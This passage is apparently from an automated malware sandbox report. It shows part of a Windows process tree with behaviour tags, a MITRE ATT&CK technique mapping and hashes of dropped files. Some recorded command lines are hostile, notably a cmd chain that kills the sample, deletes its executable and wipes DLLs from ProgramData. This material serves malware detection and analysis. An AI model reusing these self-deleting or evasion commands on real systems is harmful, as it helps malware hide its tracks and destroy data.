                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr7B0F.tmp\tempfile.ps1"
                                                                                                7⤵
                                                                                                  PID:4648
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr7B0F.tmp\tempfile.ps1"
                                                                                                  7⤵
                                                                                                    PID:4856
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr7B0F.tmp\tempfile.ps1"
                                                                                                    7⤵
                                                                                                      PID:5856
                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        8⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        PID:5292
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr7B0F.tmp\tempfile.ps1"
                                                                                                      7⤵
                                                                                                        PID:1564
                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ASqacOXEm\ASqacOXEm.dll" ASqacOXEm
                                                                                                        7⤵
                                                                                                        • Loads dropped DLL
                                                                                                        PID:2268
                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ASqacOXEm\ASqacOXEm.dll" ASqacOXEm
                                                                                                          8⤵
                                                                                                          • Loads dropped DLL
                                                                                                          • Drops file in System32 directory
                                                                                                          PID:5092
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr7B0F.tmp\tempfile.ps1"
                                                                                                        7⤵
                                                                                                          PID:5428
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr7B0F.tmp\tempfile.ps1"
                                                                                                          7⤵
                                                                                                            PID:6008
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr7B0F.tmp\tempfile.ps1"
                                                                                                            7⤵
                                                                                                            • Drops file in Program Files directory
                                                                                                            PID:6132
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr7B0F.tmp\tempfile.ps1"
                                                                                                            7⤵
                                                                                                              PID:5660
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsr7B0F.tmp\tempfile.ps1"
                                                                                                              7⤵
                                                                                                                PID:3928
                                                                                                              • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                7⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Loads dropped DLL
                                                                                                                • Drops file in Program Files directory
                                                                                                                PID:1028
                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                    1⤵
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    PID:1036
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                      2⤵
                                                                                                      • Drops file in System32 directory
                                                                                                      • Checks processor information in registry
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      • Modifies registry class
                                                                                                      PID:4532
                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                    1⤵
                                                                                                    • Drops file in Windows directory
                                                                                                    • Modifies Internet Explorer settings
                                                                                                    • Modifies registry class
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:2288
                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                    1⤵
                                                                                                      PID:4360
                                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                                      C:\Windows\system32\msiexec.exe /V
                                                                                                      1⤵
                                                                                                      • Enumerates connected drives
                                                                                                      • Drops file in Program Files directory
                                                                                                      • Drops file in Windows directory
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      • Modifies registry class
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:4428
                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 2FD6DF2DFE93B2B7D087B06010894DC9 C
                                                                                                        2⤵
                                                                                                        • Loads dropped DLL
                                                                                                        PID:4540
                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 9B66794121B2F979F744D4FB64C33FAA
                                                                                                        2⤵
                                                                                                        • Blocklisted process makes network request
                                                                                                        • Loads dropped DLL
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:4896
                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                          "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                          3⤵
                                                                                                          • Kills process with taskkill
                                                                                                          PID:1808
                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 6A72DF5E39305A6E05DDCB899A6E1D4C E Global\MSI0000
                                                                                                        2⤵
                                                                                                        • Loads dropped DLL
                                                                                                        PID:5368
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                      1⤵
                                                                                                        PID:4496
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                        1⤵
                                                                                                        • Modifies Internet Explorer settings
                                                                                                        • Modifies registry class
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:4816
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                        1⤵
                                                                                                        • Modifies registry class
                                                                                                        PID:5116
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\120D.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\120D.exe
                                                                                                        1⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:1012
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\3536.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\3536.exe
                                                                                                        1⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        PID:4852
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c timeout 1
                                                                                                          2⤵
                                                                                                            PID:800
                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                              timeout 1
                                                                                                              3⤵
                                                                                                              • Delays execution with timeout.exe
                                                                                                              PID:5700
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\3536.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\3536.exe"
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            • Checks processor information in registry
                                                                                                            PID:5796
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im 3536.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\3536.exe" & del C:\ProgramData\*.dll & exit
                                                                                                              3⤵
                                                                                                              • Modifies Internet Explorer settings
                                                                                                              PID:4360
                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                taskkill /im 3536.exe /f
                                                                                                                4⤵
                                                                                                                • Kills process with taskkill
                                                                                                                PID:4348
                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                timeout /t 6
                                                                                                                4⤵
                                                                                                                • Delays execution with timeout.exe
                                                                                                                PID:5620
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 1492
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:5840
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\3AD4.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\3AD4.exe
                                                                                                          1⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          PID:6108
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\3AD4.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\3AD4.exe"
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:200
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\3FF6.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\3FF6.exe
                                                                                                          1⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          PID:5448
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 736
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:5604
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 748
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:4592
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 852
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:3780
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 896
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:4900
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 1188
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            • Program crash
                                                                                                            PID:5920
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 1232
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:5044
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 1324
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:848
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 1368
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:5012
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 1272
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:5320
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 1348
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:4464
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 1152
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:4288
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 1160
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:4584
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 1248
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:4352
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 1376
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:1928
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 1276
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:5764
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 1352
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:1752
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 1264
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:5124
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 1324
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:6012
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 1320
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:4380
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 1264
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:5924
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 1228
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:2976
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 1168
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:5884
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 1380
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            • Modifies registry class
                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:4496
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 1160
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:5196
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 1288
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Program crash
                                                                                                            PID:3032
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 1160
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:1648
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 1228
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:3148
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 1252
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:5904
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 1288
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:2428
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 1356
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:4832
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 1384
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:5444
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 1300
                                                                                                            2⤵
                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                            • Program crash
                                                                                                            PID:4436
                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                          1⤵
                                                                                                            PID:5184
                                                                                                          • C:\Windows\explorer.exe
                                                                                                            C:\Windows\explorer.exe
                                                                                                            1⤵
                                                                                                              PID:4000
                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                              1⤵
                                                                                                                PID:4172
                                                                                                              • C:\Windows\explorer.exe
                                                                                                                C:\Windows\explorer.exe
                                                                                                                1⤵
                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                PID:1140
                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                1⤵
                                                                                                                  PID:4476
                                                                                                                • C:\Windows\explorer.exe
                                                                                                                  C:\Windows\explorer.exe
                                                                                                                  1⤵
                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                  PID:5928
                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                  1⤵
                                                                                                                    PID:4128
                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                    C:\Windows\explorer.exe
                                                                                                                    1⤵
                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                    PID:4812
                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                    1⤵
                                                                                                                      PID:4364
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                      1⤵
                                                                                                                        PID:4972
                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                        1⤵
                                                                                                                          PID:3160
                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                          1⤵
                                                                                                                          • Drops file in Windows directory
                                                                                                                          • Modifies registry class
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:5960
                                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                          1⤵
                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                          PID:4400
                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                          1⤵
                                                                                                                          • Modifies registry class
                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:4880
                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                          1⤵
                                                                                                                          • Modifies registry class
                                                                                                                          PID:5908
                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                          1⤵
                                                                                                                            PID:2656
                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                            1⤵
                                                                                                                              PID:4804
                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                              1⤵
                                                                                                                              • Modifies registry class
                                                                                                                              PID:2288
                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                              c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                              1⤵
                                                                                                                                PID:2304
                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                1⤵
                                                                                                                                  PID:1444

                                                                                                                                Network

                                                                                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                Execution

                                                                                                                                Scheduled Task

                                                                                                                                1
                                                                                                                                T1053

                                                                                                                                Persistence

                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                1
                                                                                                                                T1060

                                                                                                                                Scheduled Task

                                                                                                                                1
                                                                                                                                T1053

                                                                                                                                BITS Jobs

                                                                                                                                1
                                                                                                                                T1197

                                                                                                                                Privilege Escalation

                                                                                                                                Scheduled Task

                                                                                                                                1
                                                                                                                                T1053

                                                                                                                                Defense Evasion

                                                                                                                                Disabling Security Tools

                                                                                                                                2
                                                                                                                                T1089

                                                                                                                                Modify Registry

                                                                                                                                5
                                                                                                                                T1112

                                                                                                                                BITS Jobs

                                                                                                                                1
                                                                                                                                T1197

                                                                                                                                Install Root Certificate

                                                                                                                                1
                                                                                                                                T1130

                                                                                                                                Credential Access

                                                                                                                                Credentials in Files

                                                                                                                                4
                                                                                                                                T1081

                                                                                                                                Discovery

                                                                                                                                Software Discovery

                                                                                                                                1
                                                                                                                                T1518

                                                                                                                                Query Registry

                                                                                                                                5
                                                                                                                                T1012

                                                                                                                                System Information Discovery

                                                                                                                                5
                                                                                                                                T1082

                                                                                                                                Security Software Discovery

                                                                                                                                1
                                                                                                                                T1063

                                                                                                                                Peripheral Device Discovery

                                                                                                                                2
                                                                                                                                T1120

                                                                                                                                Remote System Discovery

                                                                                                                                1
                                                                                                                                T1018

                                                                                                                                Collection

                                                                                                                                Data from Local System

                                                                                                                                4
                                                                                                                                T1005

                                                                                                                                Command and Control

                                                                                                                                Web Service

                                                                                                                                1
                                                                                                                                T1102

                                                                                                                                Replay Monitor

                                                                                                                                Loading Replay Monitor...

                                                                                                                                Downloads

                                                                                                                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                  MD5

                                                                                                                                  7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                  SHA1

                                                                                                                                  804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                  SHA256

                                                                                                                                  bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                  SHA512

                                                                                                                                  49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                  MD5

                                                                                                                                  7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                                  SHA1

                                                                                                                                  804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                                  SHA256

                                                                                                                                  bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                                  SHA512

                                                                                                                                  49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                                • C:\Program Files\Windows Media Player\EHXPHCVLSY\ultramediaburner.exe
                                                                                                                                  MD5

                                                                                                                                  6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                  SHA1

                                                                                                                                  938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                  SHA256

                                                                                                                                  b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                  SHA512

                                                                                                                                  a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                • C:\Program Files\Windows Media Player\EHXPHCVLSY\ultramediaburner.exe
                                                                                                                                  MD5

                                                                                                                                  6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                                  SHA1

                                                                                                                                  938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                                  SHA256

                                                                                                                                  b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                                  SHA512

                                                                                                                                  a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8890A77645B73478F5B1DED18ACBF795_C090A8C88B266C6FF99A97210E92B44D
                                                                                                                                  MD5

                                                                                                                                  21ec89966012581b223f37dfcb95439a

                                                                                                                                  SHA1

                                                                                                                                  8c25eaae58a7ac90ad37ad6c9f341f94e1089ed3

                                                                                                                                  SHA256

                                                                                                                                  1765b0a85d23a048d83b9952c834498808fc59444eb4d6ef07a80109ae5b8f7c

                                                                                                                                  SHA512

                                                                                                                                  349273db8f045a414fb747ebd634179e48c3b22117fc5deb66a8c805f3620b8e7c3682e700a975482d683f3c8f945099c6408e3ae46fd41132727bc8143bd319

                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DA3B6E45325D5FFF28CF6BAD6065C907_7ACDCC18BE3F9272783F723CF7E4C78B
                                                                                                                                  MD5

                                                                                                                                  738f87d95d3387db176a831bd856d41a

                                                                                                                                  SHA1

                                                                                                                                  6c93f69de565349d8674fa25ac93906209478a8e

                                                                                                                                  SHA256

                                                                                                                                  5353cc718ad3df331ec39394a3e2b161eb273f5d915371dfb388a913f2f2d979

                                                                                                                                  SHA512

                                                                                                                                  b4492e41ed2cb21912da1761d0827898c2ae9f541f82f5911c3d9c1d99127f6289a6956ae8f0f9f86ce34be97958d0c749017182d2971800e39c5a347185e196

                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8890A77645B73478F5B1DED18ACBF795_C090A8C88B266C6FF99A97210E92B44D
                                                                                                                                  MD5

